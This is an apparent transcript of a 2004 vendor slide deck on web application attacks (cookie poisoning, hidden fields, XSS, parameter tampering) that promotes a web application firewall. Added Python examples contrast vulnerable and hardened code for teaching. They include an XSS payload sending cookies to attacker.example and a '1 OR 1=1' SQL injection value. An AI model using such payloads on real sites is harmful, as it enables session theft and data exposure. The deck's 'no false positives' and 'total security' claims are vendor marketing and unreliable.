Published by Bernice Leonard; modified over 9 years ago
Slide 1: Closing the Door on Web Application Attacks
FISSEA 2004
Confidential and proprietary information ©2004, MagniFire Websystems Inc.
Slide 2: Today's Session
- What are the risks?
- Why don't traditional solutions work?
- What can be done?
Slide 3: Ensuring 100% protection
In Israel the government has an effective way to protect sensitive data from internet hackers…
Slide 4: However, Government Is Moving Online
Unique Audience (2002) (Source: Nielsen NetRatings) [chart not reproduced in the transcript]
Slide 5: Web Servers and Web Applications: Prime Targets for Attacks
- "64% of the 10 million security incidents SecurityFocus tracked in the first week of Feb 2002 targeted port 80." (Information Week magazine)
- "Nearly 70% of all attacks in the first quarter of 2002 used port 80, a common port devoted to Web traffic." (ISS Internet Risk Impact Summary Report for 2002)
Slide 6: What are the Risks?
- Access to user databases
  - Social Security Numbers (CA)
  - Police Records (MI)
- Financial loss as a result of fraud
- Theft of secure or sensitive information
Slide 7: Web Applications Are The Weakest Point
[Layered diagram: Network, System, Desktop and Access layers covered by Net IDS, Host IDS & Secure OS, Firewall and Antivirus; the Application layer sits directly in front of the DATA]
"64% of the 10 million security incidents tracked targeted port 80." (Information Week magazine)
Slide 8: Major Categories of Web Application Vulnerabilities
Almost all Web applications are exposed: "From 45 applications, @stake found nearly 500 'significant' security defects, with an average of at least 10 per assessment" (@stake study on Web application security)
- Improper validation of user input on the Web application server side (relying on client-side validation):
  - Cookie Poisoning
  - Hidden Field Manipulation
  - Parameter Tampering
  - Stealth Commanding (e.g. SQL/OS Injection)
  - Cross-site Scripting
  - Application Buffer Overflow
  - URL & Unicode encoding
- Backdoors and debug options (left in the application)
- Poor Session Management, Access Control & Authentication
- Third Party Misconfiguration
Slide 9: Hidden Field Manipulation
- Modifying hidden form fields so that damaging data passes to the web application
- Example: Online Retail Store
  - Changing prices and stealing goods
  - Hidden field hacking in 3rd party shopping cart software
Slides 10-14: Hidden Field Manipulation - Example (screenshots; not reproduced in the transcript)
Slide 15: Cookie Poisoning
- Modifying the cookie so that the application returns unauthorized information or performs an activity on behalf of another user
- Example: Online account administration
  - Impersonation
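The two attacks on slides 9 and 15 share one root cause: the server hands the browser some state (a price in a hidden field, an identity in a cookie) and later believes whatever comes back. The following is an added example, not code from the MagniFire deck or its product, showing the vulnerable handler beside a hardened one for each. The catalog, SKUs, user names, form body and the HMAC key are all constructed for the illustration.

```python
"""Added example: server-side handling of client-controlled state
(hidden price field and identity cookie). Everything here is constructed."""
import hashlib
import hmac
from urllib.parse import parse_qs

# Constructed catalog: the server's authoritative prices (hypothetical SKUs).
CATALOG = {"SKU-100": 49.99, "SKU-200": 199.00}

# Constructed demo key; a real deployment loads a random key from secret storage.
COOKIE_KEY = b"constructed-demo-key-not-for-production"


def checkout_vulnerable(form_body: str) -> float:
    """Trusts the hidden 'price' field that the server itself put in the form."""
    form = parse_qs(form_body)
    qty = int(form["qty"][0])
    return round(qty * float(form["price"][0]), 2)


def checkout_hardened(form_body: str) -> float:
    """Ignores any client-supplied price: only the SKU and quantity are taken
    from the form, both are validated, and the price is looked up server-side."""
    form = parse_qs(form_body)
    sku = form.get("sku", [""])[0]
    if sku not in CATALOG:
        raise ValueError("unknown sku")
    qty = int(form.get("qty", ["0"])[0])
    if not 1 <= qty <= 99:
        raise ValueError("quantity out of range")
    return round(qty * CATALOG[sku], 2)


def issue_cookie(username: str) -> str:
    """Cookie value 'name.tag' where tag is an HMAC-SHA256 over the name."""
    tag = hmac.new(COOKIE_KEY, username.encode(), hashlib.sha256).hexdigest()
    return f"{username}.{tag}"


def user_from_cookie_vulnerable(cookie: str) -> str:
    """Believes whatever name the client presents (classic cookie poisoning)."""
    return cookie.partition(".")[0]


def user_from_cookie_hardened(cookie: str):
    """Returns the user name only if the tag proves this server issued it;
    editing the name part changes the expected tag, so the edit is rejected."""
    name, sep, tag = cookie.partition(".")
    if not sep or not name:
        return None
    expected = hmac.new(COOKIE_KEY, name.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):  # constant-time comparison
        return None
    return name


def demo():
    """Replays the two tampering attempts against both versions of each handler."""
    tampered_form = "sku=SKU-200&qty=1&price=0.01"   # price rewritten in the browser
    legit = issue_cookie("alice")
    poisoned = "admin." + legit.partition(".")[2]    # name swapped, tag kept
    return {
        "vulnerable_total": checkout_vulnerable(tampered_form),
        "hardened_total": checkout_hardened(tampered_form),
        "vulnerable_user": user_from_cookie_vulnerable(poisoned),
        "hardened_user": user_from_cookie_hardened(poisoned),
        "hardened_legit_user": user_from_cookie_hardened(legit),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The HMAC only proves the cookie was issued by this server; it does not stop a stolen cookie from being replayed, which is why most frameworks use an opaque random session id with the state held server-side. The "bidirectional" check on slide 51 performs the same comparison outside the application: the WAF remembers what it sent and rejects a returned value that differs.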
Slides 16-20: Cookie Poisoning - Example (screenshots; not reproduced in the transcript)
Slide 21: Buffer Overflow
- Sending more data in a request than the receiving code has room for, attacking either 3rd party or internally developed code
Slides 22-24: Buffer Overflow - Example (screenshots; not reproduced in the transcript)
Slide 25: Cross Site Scripting
- Inserting script into text fields whose contents are later displayed to other users
- Example: "Add an Item" section of a Web site
  - Site defacement
  - Changing field parameters
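The "Add an Item" scenario above is an item name that the site stores and later echoes into HTML for other users. The following is an added example, not code from the deck, that renders such names first without encoding and then with context-appropriate encoding, in both an HTML text context and a quoted attribute context (a hidden field that echoes the name, which is where "changing field parameters" bites). The page template, the item names and the two payloads, including the attacker.example host, are constructed for the illustration.

```python
"""Added example: output encoding for user-supplied item names in two
HTML contexts. Template and payloads are constructed."""
import html
import re

PAGE = "<html><body><h1>Items</h1><ul>{items}</ul></body></html>"

# Constructed payloads: a script injection and an attribute break-out.
SCRIPT_PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
ATTR_PAYLOAD = '" onmouseover="alert(1)'


def render_vulnerable(names):
    """Interpolates raw text into HTML, so markup in a name becomes live markup."""
    return PAGE.format(items="".join(f"<li>{n}</li>" for n in names))


def render_hardened(names):
    """Text context: html.escape turns < > & \" ' into entities, so the browser
    shows the payload as text instead of executing it."""
    return PAGE.format(items="".join(f"<li>{html.escape(n, quote=True)}</li>" for n in names))


def render_attr_vulnerable(names):
    """The same bug in an attribute context (a hidden field echoing the name)."""
    return "".join(f'<input type="hidden" name="item" value="{n}">' for n in names)


def render_attr_hardened(names):
    """Attribute context: quote=True is what keeps a '"' in the value from
    closing the attribute and starting a new one."""
    return "".join(
        f'<input type="hidden" name="item" value="{html.escape(n, quote=True)}">' for n in names
    )


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
_EVENT_HANDLER = re.compile(r'"\s+on\w+="', re.IGNORECASE)


def has_live_script(markup: str) -> bool:
    """Crude check used by the demo: is there an unescaped <script> tag or a
    quote-terminated event-handler attribute in the output?"""
    return bool(_SCRIPT_TAG.search(markup) or _EVENT_HANDLER.search(markup))


def demo():
    """Renders one benign and two hostile names through all four renderers."""
    names = ["Vintage lamp", SCRIPT_PAYLOAD, ATTR_PAYLOAD]
    return {
        "vulnerable_text": has_live_script(render_vulnerable(names)),
        "hardened_text": has_live_script(render_hardened(names)),
        "vulnerable_attr": has_live_script(render_attr_vulnerable(names)),
        "hardened_attr": has_live_script(render_attr_hardened(names)),
    }


if __name__ == "__main__":
    print(demo())
```

The encoding has to match the context the value lands in: html.escape is right for element text and quoted attributes, but a name placed inside a script block, a URL or a CSS value needs that context's own encoding, and a value stored "clean" on input still has to be encoded on every output.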
Slides 26-30: Cross Site Scripting - Example (screenshots; not reproduced in the transcript)
Slide 31: Known Vulnerabilities & Misconfiguration
- Exploiting configuration errors in 3rd party components, such as web and database servers
- Example (sample ODBC administration scripts installed with older IIS versions): Newdsn.exe can be used by an attacker to create files anywhere on your disk if they have the correct NTFS file permissions to do so. Newdsn.exe can also be used to overwrite the DSNs of existing on-line databases, making the information contained in the database inaccessible. This file, getdrvrs.exe, dsnform.exe and mkilog.exe should be deleted.
Slides 32-33: Known Vulnerabilities & Misconfiguration (screenshots; not reproduced in the transcript)
Slide 34: Parameter Tampering
- Modifying the parameters passed as part of the URL
- Example: Online Auction Site
  - User account access
  - Forbidden SQL query via wrong parameters
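Both bullets of the auction example above come from one handler: an account page that reads the account id from the URL and puts it into a query. The following is an added example, not code from the deck, with the vulnerable handler beside a hardened one; the hardened version adds the three checks the deck's "invalid parameter / invalid value" language points at plus the ownership check the application itself must do. The table, the three users and the request values are constructed, using sqlite3 from the Python standard library.

```python
"""Added example: URL parameter tampering against an account lookup, with the
vulnerable query beside a typed, bound and authorised one. Data is constructed."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory accounts table with three constructed users."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, owner TEXT, email TEXT)")
    con.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [(1, "alice", "alice@example.com"),
         (2, "bob", "bob@example.com"),
         (3, "carol", "carol@example.com")],
    )
    return con


def account_vulnerable(con, session_user: str, account_id: str):
    """/account?id=<account_id> pasted straight into SQL. The logged-in user is
    never consulted, so id=2 reads another user's row (user account access)
    and id=1 OR 1=1 reads every row (forbidden SQL query via wrong parameters)."""
    sql = f"SELECT owner, email FROM accounts WHERE id = {account_id}"
    return con.execute(sql).fetchall()


def account_hardened(con, session_user: str, account_id: str):
    """Three checks the vulnerable version lacks: the parameter must have the
    expected type, it is bound rather than concatenated, and the row must
    belong to the session's user."""
    if not account_id.isdigit():
        raise ValueError("id must be a positive integer")
    return con.execute(
        "SELECT owner, email FROM accounts WHERE id = ? AND owner = ?",
        (int(account_id), session_user),
    ).fetchall()


def demo():
    """Alice (session user) tampers with the id parameter against both handlers."""
    con = build_db()
    out = {
        "vuln_other_user": account_vulnerable(con, "alice", "2"),
        "vuln_injected": account_vulnerable(con, "alice", "1 OR 1=1"),
        "hard_own": account_hardened(con, "alice", "1"),
        "hard_other_user": account_hardened(con, "alice", "2"),
    }
    try:
        account_hardened(con, "alice", "1 OR 1=1")
        out["hard_injected"] = "accepted"
    except ValueError as err:
        out["hard_injected"] = f"rejected: {err}"
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Binding the parameter removes the injection; it does nothing about the id=2 case, which only the ownership predicate (or an equivalent authorisation check) closes. A WAF that knows id must match \d+ would stop the injected value but still cannot know which ids belong to which session user.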
Slides 35-36: Parameter Tampering - Example (screenshots; not reproduced in the transcript)
Slide 37: Forceful Browsing
- Jumping directly to pages that should only be reachable after passing through the application's authentication mechanisms
- Example: Auction Web Site
  - Breaching users' privacy
  - Direct file access
Slides 38-40: Forceful Browsing - Example (screenshots; not reproduced in the transcript)
Slide 41: Reasons for Web Application Vulnerabilities
- Applications were written according to client-server security standards (relying on client-side validation)
- The complexity of platforms and environments makes secure coding very difficult
- Web developers focus on functionality and performance, not on security
- Web developers are not trained in secure programming
- Bugs in Web infrastructure (OS and Web platforms) and in Web applications
- Web sites are changed/updated frequently
The threat is exacerbated by the availability of:
- Web application client-side source code (hackers gain information for planning attacks)
- Widely available, free, easy-to-use hacking tools
Slide 42: Existing Security Solutions are Inadequate
Slide 43: Traditional Security Solutions Don't Protect Web Applications
Current solutions are not enough (CSI & FBI 2002):
- 89% of respondents have a firewall
- 60% of respondents used at least one Intrusion Detection System
However:
- 40% reported system penetration from the outside
- 40% reported DoS attacks
Firewalls: "Firewalls offer little protection at the application layer because ports within the firewall have to be left open for communication" (IDC 2002)
Network IDS: "Intrusion detection systems are a market failure, and vendors are now hyping intrusion prevention systems, which have also stalled. Functionality is moving into firewalls, which will perform deep packet inspection for content and malicious traffic blocking, as well as antivirus activities." (Gartner, 2003)
Slide 44: Fundamental Problem with IPS/IDS: 'Negative Security Logic'
How it works: let everything through except what can be identified as malicious traffic (based on attack signatures & traffic characteristics).
Problems:
- Protects only against known attacks (whose signature and/or characteristics are known and defined)
- Requires constant updating of the attack signature / characteristics database
- Doesn't protect against "zero day" attacks
- Doesn't protect against attacks based on illegal user input:
  - Cookie Poisoning and Hidden-Field Manipulation
  - Parameter (Form-Field) Tampering
  - Forceful Browsing
  - Backdoors and debug-option exploitation
Slide 45: Traditional Security Solutions Don't Protect Web Applications
Coverage as rated by the vendor on the slide (columns: HIPS, NIPS, FW, TrafficShield; cells that did not survive the transcript are left blank):

Threat                              HIPS     NIPS     FW       TrafficShield
Known Web Worms                     Yes               Limited  Yes
Unknown Web Worms                   Partial  Limited  No       Yes
Known Web Vulnerabilities           Yes      Partial  Limited  Yes
Unknown Web Vulnerabilities         Partial  Limited  No       Yes
Illegal Access to Web-server files  Yes      No       Limited  Yes
Forceful Browsing                   No                         Yes
File/Directory Enumerations         No       Limited  No       Yes
Brute Force attacks                 No                         Yes
Buffer Overflow                     Partial  Limited           Yes
Cross-Site Scripting                No       Limited           Yes
SQL/OS Injection                    Partial  No                Yes
Cookie Poisoning                    No                         Yes
Hidden-Field Manipulation           Yes      No                Yes
Parameter Tampering                 No                         Yes
Flood attacks (GET, 404)            No       Limited           Yes
SSL Flooding                        No       Limited  No       Yes
Slide 46: Current Application-Layer Approaches: Scan-and-Fix
Scanning HTML code for known breaches and then rewriting it is ineffective and costly compared to installing an application firewall:
- Time-consuming, due to the high rate of false positives that must be evaluated
- Ineffective, since it does not find all vulnerabilities, thereby requiring additional techniques (e.g. manual code review) to ensure protection
- Requires code rewrites, which are very expensive in terms of both time and resources
- Slows down product development, since every change in the application requires a new "scan & fix" iteration
- Useless for 3rd party web applications, since they can't be altered
- Defenseless against new threats, since it only looks for known vulnerabilities
Slide 47: The Solution: Granular & Tailored Application-Specific Security
Slide 48: Solution Criteria
Web Application Firewall using Positive Security Logic:
1. Model the application extremely accurately
2. Auto configuration / customization around the app
3. No false positives or false negatives
4. Minimal ongoing policy management
5. No latency introduced (<1 ms)
Slide 49: Model the Application Flow
[Diagram: Web Application -> Application Flow -> Application Flow Model; the transition shown is "CHANGE USER ID"]
Actions not known to be legal can now be blocked:
- wrong page order
- invalid parameter
- invalid value
- etc.
Slide 50: The Application Flow Model
Application Flow Model: an accurate representation of the designed interaction between the user and the Web application.
- A legal user will request:
  - links existing in the Web page currently browsed, OR
  - Web pages which are entry points to the app
- Thus, a legal request to a Web page should always have two characteristics:
  - it should come from a link embedded in the page the user is currently browsing*
  - it should comply with the request definition in the Web page the user is currently browsing, which defines:
    - the request method
    - the request parameters
    - the request parameter values
* Unless the page requested is an entry point to the Web application.
Slide 51: The Application Flow Model
- Stateful: tracks which page a user is coming from, and the specific permissions associated with that context.
  - A request which is perfectly legal within the context of one page might be inappropriate for a user on another page.
- Bidirectional: looks at server responses to the client as well as client requests to the server.
  - Essential to verify that the user hasn't tampered with the credentials (cookies, hidden fields) sent to him in the response.
- Granular: a complete logical rendering of the transitions between every page, including every object, every parameter of each object, and every legal value of each object parameter.
Application Flow Model: the only way to provide total security in front of Web applications (the only way to replace embedded security code).
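Slides 49-51 describe an enforcement algorithm without showing one. The following is an added example, not MagniFire's code, of a minimal positive-security enforcer built on that description: per request it decides whether the target is an entry point or a link embedded in the page the session last received, and whether the method, parameter names and parameter values match that link's definition, so that "wrong page order", "invalid parameter", "invalid value" and a cold request to an interior page (forceful browsing) are each rejected with a reason. The pages, links and value regexes form a constructed model of a small auction site; a product would derive them by crawling and from traffic, as the next slides describe. The pre-built index makes each decision a dictionary lookup, which is what slide 55 means by translating enforcement into hash searches.

```python
"""Added example: positive-security enforcement over a constructed
application flow model (pages, embedded links, per-parameter value rules)."""
import re
from dataclasses import dataclass


@dataclass
class Link:
    """One legal request embedded in a page: method, target and, per
    parameter name, the regex the value must fully match."""
    method: str
    target: str
    params: dict


# Constructed flow model: page -> links that page embeds.
FLOW_MODEL = {
    "/login": [
        Link("POST", "/account", {"user": r"[a-z]{1,16}", "pw": r".{8,64}"}),
    ],
    "/account": [
        Link("GET", "/auction", {"id": r"\d{1,8}"}),
        Link("GET", "/logout", {}),
    ],
    "/auction": [
        Link("POST", "/bid", {"id": r"\d{1,8}", "amount": r"\d{1,6}(\.\d{2})?"}),
        Link("GET", "/account", {}),
    ],
    "/bid": [
        Link("GET", "/auction", {"id": r"\d{1,8}"}),
    ],
    "/logout": [],
}
ENTRY_POINTS = {"/login"}

# Indexed once so that enforcement is a hash lookup per request.
FLOW_INDEX = {
    page: {(link.method, link.target): link for link in links}
    for page, links in FLOW_MODEL.items()
}


def check_request(sessions: dict, sid: str, method: str, path: str, params: dict):
    """Returns (allowed, reason); on success records the page the session is now on."""
    if path in ENTRY_POINTS:
        if method != "GET" or params:
            return False, "entry point accepts only GET without parameters"
        sessions[sid] = path
        return True, "entry point"
    current = sessions.get(sid)
    if current is None:
        return False, f"{path} requested without passing an entry point (forceful browsing)"
    link = FLOW_INDEX.get(current, {}).get((method, path))
    if link is None:
        return False, f"{method} {path} is not linked from {current} (wrong page order)"
    for name in params:
        if name not in link.params:
            return False, f"unexpected parameter {name!r}"
    for name, pattern in link.params.items():
        if name not in params:
            return False, f"missing parameter {name!r}"
        if not re.fullmatch(pattern, params[name]):
            return False, f"invalid value for {name!r}"
    sessions[sid] = path
    return True, "matches link definition"


def run_demo():
    """A legal session followed by four illegal requests (constructed traffic)."""
    sessions = {}
    traffic = [
        ("s1", "GET", "/login", {}),
        ("s1", "POST", "/account", {"user": "alice", "pw": "correct horse"}),
        ("s1", "GET", "/auction", {"id": "17"}),
        ("s1", "POST", "/bid", {"id": "17", "amount": "99.00"}),
        ("s1", "GET", "/auction", {"id": "17 OR 1=1"}),         # invalid value
        ("s1", "GET", "/auction", {"id": "17", "debug": "1"}),  # unexpected parameter
        ("s1", "GET", "/admin", {}),                            # wrong page order
        ("s2", "GET", "/account", {}),                          # forceful browsing
    ]
    return [check_request(sessions, *request) for request in traffic]


if __name__ == "__main__":
    for allowed, reason in run_demo():
        print("ALLOW" if allowed else "BLOCK", reason)
```

Two things this toy leaves out are exactly what the later slides address: links produced by JavaScript at runtime are invisible to a static page model (hence the active-code analysis and response-based learning of slides 52-53), and a single "current page" per session breaks as soon as a user opens two tabs, which is one source of the false positives slide 54 discusses.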
Slide 52: Hybrid Policy Generator: Creating the Application Flow Model
- Automatic analysis of Web page content:
  - purpose-built crawler
  - complete analysis of the Web page content, including active code such as JavaScript
  - 'learns' all details of the interaction between the user and the Web application
- Iterative policy adjustment:
  - examines how users interact with the application over time, based on real-life traffic
  - recommends adjustments to the current policy, based on on-line analysis of the rejected traffic
Slide 53: Hybrid Policy Generator
[Comparison table; columns: Model User Flow, Static Parameters, Active-Code Analysis, Dynamic Parameters, Accurate Security Policy. Rows, with the cell values that survived the transcript: Crawler based Learning: Yes, No; Request based Learning: No, Limited, No; Response based Learning: Partial, Yes, No, Yes, No; Hybrid Approach: Yes]
Hybrid policy generation combines crawler-based application modeling with adjustments based on real-life request analysis:
- request-based learning is very useful for detecting missing elements in the policy
- response-based learning is limited in its analysis to avoid significant latency
Slide 54: No False Positives, No False Negatives
- Constraints that prevent vulnerabilities in certain cases can cause false positives in other cases.
- A low-granularity policy means either false positives, or low security (false negatives) due to a relaxed policy.
- The solution: a granular security policy that is accurately adjusted to the protected Web application:
  - constraints are adjusted to the Web application flow model (no need to relax security constraints)
  - policy enforcement takes into account user state
  - no false positives (constraints are not applied where they are not applicable)
Slide 55: Low Latency
- Security policy enforcement is translated into hash searches
- Hardened Linux appliance:
  - eases deployment
  - eliminates misconfiguration
  - optimized performance and throughput
- Scalable architecture: Shield units can be added to handle larger traffic volumes
- Automatic recovery from unit failure, based on the fact that units are identical and can switch roles
- Central and secure management
Slide 56: Solution Criteria and how the solution meets them
Criteria:
1. Model the application extremely accurately
2. Auto configuration / customization around the app
3. No false positives or false negatives
4. Minimal ongoing policy management
5. No latency introduced (<1 ms)
Solution elements set against them on the slide:
- Crawling & full analysis of web pages
- Adjustments based on real-life traffic
- 'Learning Mode' automatically recommends policy adjustments based on customer activity
- Any non-recognized activity is blocked
- Automated mapping & policy suggestions
- Appliance: fits into the web infrastructure
- Automatic detection of website changes and suggestions for a newly-tailored policy
- Network appliance with a modified OS for high throughput
Slide 57: Thank You!